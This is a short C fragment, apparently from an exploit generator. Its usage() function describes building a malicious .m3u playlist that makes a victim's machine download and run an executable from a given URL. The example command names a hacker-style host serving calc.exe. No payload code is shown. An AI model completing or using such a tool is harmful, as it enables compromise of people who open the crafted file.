
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {char* platform; } ;


 int exit (int ) ;
 int printf (char*,...) ;
 TYPE_1__* targets ;

int usage(char *filename) {
  int i;
  printf("Usage: \t%s <filename> <url> <targ>\n\n",filename);
  printf("       \t<filename>    : Output filename\n");
  printf("       \t<url>         : Complete url of the executable to download\n");
  printf("       \t<targ>        : Target from the list below\n\n");
  printf("Ex:    \t%s exploit.m3u http://www.x0n3-h4ck.org/calc.exe 0\n\n",filename);

  printf("#   \t Platform\n");
  printf("-----------------------------------------------\n");
  for(i = 0; targets[i].platform; i++)
        printf("%d \t %s\n",i,targets[i].platform);
  printf("-----------------------------------------------\n");
  exit(0);
}
